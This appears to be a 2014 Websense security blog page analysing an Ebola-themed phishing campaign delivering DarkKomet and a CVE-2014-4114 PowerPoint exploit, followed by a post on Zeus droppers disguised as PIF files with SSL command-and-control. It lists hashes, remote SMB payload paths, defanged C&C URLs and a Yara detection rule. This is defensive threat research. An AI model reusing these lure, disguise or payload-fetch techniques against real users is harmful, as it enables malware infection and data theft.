News Categories
(34)Malware (39)Malicious emails (11)Web 2.0 (24)Facebook (22)Social Networks (44)Spam (2)Defensio (1)Comment Spam (15)Phishing (9)Web spam (4)Click-jacking (38)Compromise (20)Analysis (38)Exploits (14)Research (3)Presentations (3)Conferences (4)security conference (9)Mass Injection (10)Rogue AV (4)Blackhat SEO (2)Neosploit (23)Targeted attacks (7)Video (14)Zeus (5)Microsoft (4)Monthly Reports (1)twitter (3)Google (18)Vulnerabilities (9)Adobe (12)Java (4)Mobile (4)Apple (1)hacked (1)TAB (1)Black Hat USA 2011 (1)Google+ (20)0-day (1)CVE-2010-2884 (1)CVE-2011-1255 (1)Worm (14)Blackhole exploit kit (1)Incognit Exploit kit (2)Tuesday Patch (6)APT (6)Typosquatting (3)Vulnerability Analysis (1)CVE-2011-3402 (4)Web Research (4)Predictions (3)Adult (5)News (3)Black Hat SEO (6)Data loss (8)Scam (1)QR codes (6)Twitter (1)CVE-2012-0003 (1)CVE-2011-3389 (1)CVE-2012-0004 (1)Phoenix Exploit Kit (1)CrimePack (3)Reverse Engineering (2)Captcha (1)Valentine's day (2)Kelihos (1)SC Magazine Award Winner (1)Wordpress (1)MS12-010 (1)CVE-2012-0002 (1)Infosec (2)CVE-2012-0507 (8)Toolkits (1)Skywiper (2)Flame (1)Flamer (2)Passwords (1)freedom of expression (1)censorship (2)Plugins (3)Malvertising (14)Exploit (1)CVE-2012-1723 (1)CSI (2)ThreatSeeker (2)Adventures in Spam (1)CVE-2012-4681 (1)LBS (2)RAT (1)module Apache/2 (1)Cyber Monday (1)Black Friday (1)Pastebin (4)CVE-2012-4792 (1)iPad (1)super bowl (1)iPhone (2)iOS (4)Spear Phishing (1)Threat Report (3)ThreatScope (1)Dynamic DNS (1)China (1)SSL (1)APT1 (2)DLP (3)Hack (1)CVE-2012-4969 (2)threat lifecycle (1)ThreatSeeker Network (1)ACE (10)exploit kit (1)blackhole (2)Black Hole (1)DNS poisoning (1)RedKit Exploit Kit (4)exploit kits (1)threat stages (1)Certificates (1)Topical (1)Waterhole (1)CVE-2013-2463 (1)Neutrino exploit kit (1)CVE-2013-2473 (1)CVE-2013-3893 (2)Collective Threat Intelligence (1)CVE-2013-3963 (1)Targeted Attack (3)Advanced Malware (1)CVE-2013-3897 (1)Tor (5)cyber-crime (1)Mevade (2)Ransomware (3)Social Engineering (1)CookieBomb (2)LinkedIn (1)CVE-2013-3906 (2)Pony (3)Cryptolocker (2)Upatre (1)application telemetry (1)meta-data (3)dr. watson (1)windows error reporting (1)big data (2)data theft prevention (1)DTP (1)telemetry (2)CVE-2014-0322 (2)MSIE 0-day (1)Deputy Dog (1)Ephemeral Hydra (1)CVE-2013-0074 (1)CVE-2013-3896 (1)Silverlight (2)crash reports (1)POS (1)anomaly detection (1)goon (4)angler (1)ru:8080 (1)magnitude (3)flash (1)CVE-2013-2465 (1)malicious iframes (1)FIESTA (1)Exploits Kit (1)iframe (3)CVE-2014-0160 (2)OpenSSL (3)Heartbleed (3)Citadel (2)CVE-2014-1776 (1)VGX.DLL (1)necrus (1)cutwail (2)gameover (3)vulnerability (3)zbot (1)control panel (1)carberp (1)zberp (1)Caphaw (2)Nuclear exploit kit (1)Shylock (1)Dragonfly (1)Zeus PIF (1)bitly (1)fraud (2)RIG Exploit Kit (1)POS malware (1)Point Of Sale Malware (1)Ukraine (1)Russia (1)Shellshock (1)CVE-2014-6271 (1)poodle (1)cve-2014-3566 (1)sslv3 (1)Ebola (1)CVE-2014-4114 (1)CPA (1)Regin (1)CVE-2015-0311 (1)CVE-2015-0235 (1)linux (1)GHOST (1)CVE-2015-0072 (1)Internet Explorer (1)XSS (1)IE (1)TorrentLocker (1)Product Information (1)Money Laundering (1)APSA10-05 (1)Skype spam
RSS Feed
Ebola Spreads - In Cyber Attacks Too
Posted by uwang on 23 October 2014 12:08 PM

The Ebola virus has been spreading in West Africa since first appearing in Guinea in December, 2013. Its rising rate of infection, high mortality rate, and challenging isolation and containment requirements have raised world-wide alarm.


Against that backdrop, Websense® Security Labs has found two distinct malicious campaigns that take advantage of the Ebola issue, and it's probably safe to assume that the topic will continue to be abused in the future.


DarkKomet RAT/Backdoor Campaign

Beginning October 10, 2014, Websense® ThreatSeeker® Intelligence Cloud has detected thousands of malicious emails taking advantage of the Ebola topic. The subject line is:

  • Subject: Ebola Safety Tips-By WHO


At the beginning of the campaign, the messages contained a redirect URL that led victims to a download location for a RAR archive. The archive contained the DarkKomet RAT/Backdoor. DarkKomet is a Remote Administration Tool (RAT) that provides full access to remote clients. It is used by attackers to control the victim's computer and steal information. In more recent emails, the campaign evolved to include direct attachment of executables, and then to direct attachment of a RAR archive containing the executable. The sample below shows the RAR attachment variant.

The malware in this campaign contacted a server located in Romania:

ThreatScope has identified malware samples as malicious. Here are two file variants in the campaign:

SHA1 : e2bdede8375da63998562f55a77d4b078d3b5646     ThreatScope Analysis Report : Link

SHA1 : 91ff874eb5bde1bb6703e01d7603d3126ddd01fc       ThreatScope Analysis Report : Link



CVE-2014-4114 & CVE-2014-6352 - Windows OLE Remote Code Execution Vulnerabilities

On October 14, 2014, iSIGHT discovered vulnerability CVE-2014-4114, used in the Sandworm campaign that targeted NATO, the European Union, and members of the Telecommunications and Energy sectors. CVE-2014-4114 can allow remote code execution if a user opens a specially crafted Microsoft Office file containing an OLE object. The vulnerability is in all supported releases of Microsoft Windows, excluding Windows Server 2003. Because the vulnerability does not involve memory corruption that can result in shellcode, and because it is in the category of 'design error', protection methods like DEP and ASLR are not effective. Example exploit code for CVE-2014-4114 has been spotted posted on the web. Criminal actors could potentially use it to build a vulnerable PowerPoint file to spread the malware. Also, shortly after the disclosure of CVE-2014-4114, a very similar vulnerability that also targets OLE objects, surfaced  and is described as CVE-2014-6532. While CVE-2014-4114 has been patched by Microsoft, CVE-2014-6532 still awaits a patch.


Websense® Security Labs has noticed that the Ebola topic has been abused in relation to CVE-2014-4114. A sample from a third-party source, named "Ebola in American.pps", was leveraging CVE-2014-4114 to download and execute a payload from a remote address via the SMB protocol, which most of the time isn't allowed to connect to public Internet addresses.


  • \\\public\install.inf
  • \\\public\word.exe


It is possible to detect CVE-2014-6352 using Yara. Here is a Yara rule that can be run against Microsoft Office files to surface the vulnerability. The rule could use a bit of tweaking and expanding to include INF files:


rule cve_2014_6352


        $rootentry = {52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00 72 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 00 05 00 ff ff ff ff ff ff ff ff 01 00 00 00}

        $ole10native = {4F 00 ( 4C | 6C ) 00 ( 45 | 65 ) 00 31 00 30 00 4E 00 61 00 74 00 69 00 76 00 65 00 00}

        $c = "This program cannot be run in DOS mode"


    ($rootentry or $ole10native) and $c



Websense customers are protected against this threat with ACE, our Advanced Classification Engine, at the different stages of the attack detailed below:


  • Stage 2 (Lure) – ACE protects against lure email messages and URLs containing the threat.
  • Stage 4 (Exploit) – ACE has real-time detection for exploit code that attempts to deliver the threat.
  • Stage 5 (Dropper) – ACE has detection for the malicious files delivered by this threat.
  • Stage 6 (Call Home) – ACE detects the communication to the associated C&C points associated with this threat.


Blog contributors: Ulysses Wang, Ran Mosessco, Nicholas Griffin.



Read more »


Websense Security Labs™  have identified a Zeus strain that implements information stealing procedures that appear to be an evolution of the 'DNA' of previous emerging Zeus variants. The Zeus variants in the campaign we're about to describe also appear to be using Zeus droppers that employ the hidden Windows 'PIF' file extension - a file extension that used to be popular many years back, that was often associated with viruses then, and that appears to be making a comeback.


Websense® ThreatSeeker® Intelligence Cloud has been tracking a malicious low volume email campaign over the last months that employs exploits and social engineering tricks to spread the evolving breed of the Zeus banking malware. Specifically, the Zeus variants spotted in the campaign have been seen to persistently evolve and adapt their methods to implement information stealing procedures (a.k.a. 'hooking procedures') that are a direct evolution of a previous variant dubbed 'Zberp'. This trend indicates a clear persistent effort to evade detection from client-side security software.


In this blog we're going to take a look at some email examples and prototype the lure emails that are part of this campaign. Furthermore, we're going to take a look at how we believe the actors behind the Zeus strain seen in the campaign modified Zeus' hooking routines persistently, and employed other tactics in order to evade detection by client-side security software and network-based security software.


Co-Writer: Nick Griffin.


The Lure Emails 


The lure emails typically hold subjects that are aimed to entice the target to download and run a file from a URL. For example, messages have been seen to include subjects like: "eFax message from fax #", "Payment confirmation", "Pending consumer complain", "Failed delivery for package", etc. The email messages don't contain file attachments, but rather a URL link to a ZIP file that contains a PIF file that is the Trojan Zeus Dropper. PIF is another executable extension (like .exe, etc.) and it operates like other executable files. One of the direct advantages of the PIF file is that the extension is hidden even if Windows is configured to show file extensions of known file types. The additional direct advantage of using PIF files with this campaign is that the lures are sent as 'PDF' files that are actually PIF files, which is a direct attempt to deceive the user in case they are able to see the extension.


At first we were surprised to see PIF files used with this campaign because PIF files are most often associated with old virus threats that existed many years ago, and the file extension is not often seen to be used by modern malware. PIF files (Program Information Files) were created to serve specific functionality that defines how a given DOS program should be run. PIFs are analyzed by Windows' ShellExecute function and are run as specified by their content, not extension, which makes them convenient to use in social engineering tricks because their file extension does not appear to the target, which improves the chances that the target will double-click on the file attempting to run it, thereby getting infected.


Zeus dropper Inside the ZIP file example:



The lure emails' content seems to be of good quality. The messages do not contain spelling mistakes and include, at times, pictures in order to appear more convincing (some example screenshots are included below). The URLs used in the messages that lead to Zeus Droppers appear to be of two kinds; some are URLs that were registered only for a few days, and some utilize compromised websites. The Zeus PIF dropper files, as often seen with modern malware, appear to be 'crypted', which is a term used to describe that the file was 'repackaged' for the purpose of evading antivirus detection and other file scanning solutions.


Last week we observed this campaign using email themes that appeal to Canadian targets, and we noticed that the dropped Zeus variants specifically targeted Canadian banks (more on that in the next section).


Here are a few VirusTotal references to the Zeus PIF Dropper included in this campaign and screenshots of the lure emails they were a part of:


Email subject: Failed delivery for package #1398402

File name:

VirusTotal detection rate: 2%.

ThreatScope analysis: link


Email subject: Pending consumer complaint

File name:

VirusTotal detection rate: 11% 

ThreatScope analysis: link


Email subject: Your Order #742830017 - PROCESSED

File name:

VirusTotal detection rate: 9% 

ThreatScope analysis: link


Lure email examples:






Hooking Detection Evasion Evolution


Looking under the hood and digging into the Zeus binaries spreading throughout this campaign shows the efforts made to evade client-side security software, especially the security software that aims to alert on 'malicious hooks' - the places on the computer where the malware inserts procedures aimed to eavesdrop on legitimate processes like browsers. One interesting observation is that the code seems to be an evolution of the 'hooking' procedures used by the Zeus variant known as 'Zberp'. On top of the 'hooking' changes, it is interesting to see that the format of the configuration file is a modification of the one used by frequently seen Zeus variants. In the following screenshots you can see a snapshot series representing the evolution of the changing patterns aimed to evade detection as spotted with the Zeus PIF variants in this campaign in comparison to 'Zberp':


Hooking evolution:





The Growing Importance Of SSL Content Inspection


Upon decryption of the Zeus configuration files used in this campaign, it's evident that the bot communicates and 'calls home' to its command and control servers using HTTPS. The Zeus configuration file contains a number of entries that indicate that HTTPS is utilized (HTTP + SSL encryption). Screenshots below show the URL the bot calls to download an update, and the URL the bot calls to drop stolen information.


After looking into the command and control domains, it was found that they all had valid and signed certificates, for a short period of 3 months, from a certification authority known as 'Comodo Essential SSL' (see screenshots of certificates below). Modern browsers normally give a layer of defense to browsing users against untrusted certificates by alerting and blocking access to the website, which unfortunately in this instance is not the case. This gives the actors behind this campaign another layer of resilience and anonymity because their malicious domains appear to be more trusted and at the same time pose a much bigger challenge to inspect because network communication is encrypted by SSL. This could explain why the domains involved with the variants we've looked into for this blog have low detection rates: 


hxxps:// - VirusTotal detection rate: 4%.

hxxps:// - VirusTotal deection rate: 2%

hxxp:// - VirusTotal detection rate: 2%

hxxps:// - VirusTotal detection rate: 2%


You may ask yourself, Why is SSL inspection important? Imagine that you have a sandbox on your network that inspects executables that go through your network. If your sandbox solution does not use SSL inspection it will not see a file that has gone through the network encrypted with SSL. In this case, the bot can update itself by downloading an executable file using SSL, which will defeat any sandbox that doesn't employ SSL inspection. For example: hxxps:// .

Zeus PIF variant configuration file:


Valid certificates employed by the command and control servers:


Zeus configuration file and the list of web injects targeting various banks in Canada:



Websense customers are protected against this threat with ACE, our Advanced Classification Engine, at the stages detailed below:

  • Stage 2 (Lure) – ACE protects against lure email messages containing the threat.
  • Stage 4 (Exploit Kit) – ACE has real-time detection for exploit code that attempts to deliver the threat.
  • Stage 5 (Payload) – ACE has detection for the malicious payloads delivered by this threat; SSL inspection is supported with Websense® TRITON® ThreatScope™
  • Stage 6 (Call Home) – ACE detects the communication to the associated C&C in real-time, supported by SSL inspection.





In this blog we covered a malicious email campaign that employs an evolving strain of the infamous Zeus malware. The campaign has been ongoing for months in bursts of low volume attacks that have been evolving to evade detection employed by client-side security software. The actors behind this campaign seem to be savvy and in-the-know regarding what is needed to accommodate durability and to sustain 'longer periods' of undetected covert activity from their main criminal tool, the Zeus bot. The persistence of the actors behind this campaign is represented in their continual effort to change and modify the 'DNA' of the Zeus bot in order to avoid detection and by utilizing other techniques, like command and control servers that utilize SSL to sustain the duration and success of their campaign, which has the ultimate purpose of data theft.


We also managed to connect the previously observed 'Zberp' Zeus strain to this campaign in terms of evolution. This shows that the 'cat and mouse' game is ever continuing. Because the Zeus source code was leaked back in 2011, many evolving variants of the bot started to spawn by different cyber-criminal groups. New variants have been given different names, and we believe the list of variants is going to grow. Strains that may at first look quite different, often have the familiar Zeus at their core. Tracking and dissecting the evolution of a malware strain allows us to know exactly the technological challenges that come with it and what is required to stop it.

Read more »